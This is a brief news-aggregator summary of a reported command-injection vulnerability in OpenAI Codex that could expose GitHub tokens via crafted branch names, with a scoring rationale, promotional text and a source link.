OpenAI Codex Exposes GitHub Tokens Via Command Injection

Phantom Labs, the research arm of BeyondTrust, reported on March 30, 2026 that a command-injection vulnerability in OpenAI’s Codex could expose short-lived GitHub OAuth tokens by manipulating branch names during task creation. The flaw affected Codex web UI, CLI, SDK and IDE integrations and could be scaled across repositories; OpenAI has deployed fixes including input validation, stronger shell escaping and reduced token scope and lifetime.
Scoring Rationale
This is a high-impact security disclosure with official fixes from OpenAI and broad enterprise implications, boosting credibility and scope. Score reduced slightly for limited technical PoC detail and because mitigations have already been deployed, though practitioners must still act on input validation and token policies.
Practice interview problems based on real data
1,500+ SQL & Python problems across 15 industry datasets — the exact type of data you work with.
Try 250 free problemsStep-by-step roadmaps from zero to job-ready — curated courses, salary data, and the exact learning order that gets you hired.
Sources
- Read OriginalOpenAI Codex vulnerability enabled GitHub token theft via command injection, report findssiliconangle.com

